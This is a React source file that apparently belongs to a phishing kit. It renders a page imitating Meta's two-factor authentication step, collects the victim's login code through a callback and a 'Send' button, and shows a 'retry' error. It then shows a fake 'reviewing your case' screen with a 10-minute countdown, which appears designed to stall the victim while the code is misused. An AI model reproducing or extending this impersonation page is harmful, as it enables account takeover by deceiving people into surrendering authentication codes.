import React, { useState } from "react";
import images from "./assets/images";
import CountdownTimer from "./components/CountDown";
import Button from "./components/Button";
import ProgressBar from "./components/ProgressBar";

export default function TwoFactor({
  showPassTow,
  showInfo,
  showCountDown,
  showAlert2,
  onInputChange,
  sendMail,
  onCountdownEnd,
  disabled,
}) {
  const [inputValue, setInputValue] = useState("");
  const handleInputChange = (e) => {
    const value = e.target.value;
    setInputValue(value);
    onInputChange(value); // Gọi hàm callback và truyền giá trị của input
  };
  return (
    <div style={{ backgroundColor: "rgb(245, 246, 246)", height: "100vh" }}>
      <div
        style={{
          backgroundColor: "rgb(255, 255, 255)",
          boxShadow: "rgba(0, 0, 0, 0.1) 1px 1px 8px 1px",
          textAlign: "left",
        }}
      >
        <div
          style={{
            paddingTop: "15px",
            paddingLeft: "30px",
            paddingBottom: "10px",
          }}
        >
          <img src={images.meta} alt="" height="15" />
        </div>
      </div>
      <div
        className="body"
        style={{ display: "flex", justifyContent: "center" }}
      >
        {showPassTow && (
          <div
            style={{
              marginTop: "40px",
              marginRight: "10px",
              marginLeft: "10px",
              maxWidth: "600px",
            }}
          >
            <div
              style={{
                backgroundColor: "white",
                minHeight: "200px",
                borderRadius: "5px",
                border: "1px solid rgb(208, 208, 208)",
              }}
            >
              <div
                className="title"
                style={{
                  fontWeight: "bold",
                  color: "rgb(75, 79, 86)",
                  padding: "10px 10px 0px",
                  fontSize: "16px",
                }}
              >
                Two-factor authentication required (2/3)
              </div>
              <hr style={{ borderTop: "0.5px solid rgb(255, 255, 255)" }}></hr>
              <div className="bodyofcard">
                <div
                  style={{
                    padding: "10px",
                    fontSize: "14px",
                    fontWeight: "400",
                  }}
                >
                  Your account has two-factor authentication switched on, which
                  requires this extra login step.
                </div>
                <div
                  style={{
                    padding: "10px",
                    fontSize: "14px",
                    fontWeight: "400",
                    display: "flex",
                  }}
                >
                  Enter the 6-8 digit code from your
                  <div
                    style={{
                      fontWeight: "bold",
                      paddingRight: "5px",
                      paddingLeft: "5px",
                    }}
                  >
                    code generator
                  </div>
                  or third-party app below.
                </div>
                <div
                  style={{
                    padding: "10px",
                    fontSize: "14px",
                    fontWeight: "400",
                    display: "flex",
                    alignItems: "center",
                  }}
                >
                  <input
                    type="number"
                    placeholder="Login code"
                    value={inputValue}
                    onChange={handleInputChange}
                    style={{
                      padding: "15px 10px",
                      fontSize: "14px",
                      fontWeight: "400",
                      border: "1px solid rgb(208, 208, 208)",
                    }}
                  />
                  {showCountDown && (
                    <CountdownTimer
                      seconds={60}
                      onCountdownEnd={onCountdownEnd}
                    />
                  )}
                </div>
                {showAlert2 && (
                  <div
                    style={{
                      color: "rgb(220, 53, 69)",
                      fontSize: "14px",
                      marginTop: "15px",
                      marginBottom: "15px",
                      marginLeft: "10px",
                    }}
                  >
                    The code generator you entered is incorrect, please try
                    again!
                  </div>
                )}
              </div>
              <hr style={{ borderTop: "0.5px solid rgb(255, 255, 255" }}></hr>
              <div
                className="footercard"
                style={{
                  display: "flex",
                  justifyContent: "space-between",
                  alignItems: "center",
                  padding: "5px 20px 10px",
                }}
              >
                <div
                  style={{
                    fontSize: "14px",
                    fontWeight: "600",
                    color: "rgb(56, 88, 152)",
                  }}
                >
                  Need another way to authenticate?
                </div>
                <Button disabled={disabled} onClick={sendMail}>
                  Send
                </Button>
              </div>
            </div>
          </div>
        )}
        {/* //chay 10 phut */}
        {showInfo && (
          <div
            style={{
              marginTop: "40px",
              marginRight: "10px",
              marginLeft: "10px",
              maxWidth: "700px",
            }}
          >
            <div
              style={{
                backgroundColor: "white",
                minHeight: "200px",
                maxWidth: "700px",
                borderRadius: "5px",
                border: "1px solid rgb(208, 208, 208)",
                display: "flex",
                padding: "30px",
              }}
            >
              <div
                className="image"
                style={{
                  display: "flex",
                  alignItems: "center",
                  justifyContent: "center",
                  marginRight: "30px",
                }}
              >
                <img width={'200px'} src={images.ref} alt="" />
              </div>
              <div className="text">
                <div className="" style={{ fontWeight: "bold" }}>
                  Hi, We are receiving your information
                </div>
                <div
                  className=""
                  style={{ marginTop: "20px", marginBottom: "20px" }}
                >
                  Reviewing your activity takes just a few more moments. We
                  might require additional information to confirm that this is
                  your account
                </div>
                <div className="">
                  Please wait, this could take up to 5-10 minutes, please be
                  patient while we review your case... 
                  <CountdownTimer seconds={600}/>
                </div>
                <ProgressBar duration={800}/>
              </div>
            </div>
          </div>
        )}
      </div>
    </div>
  );
}
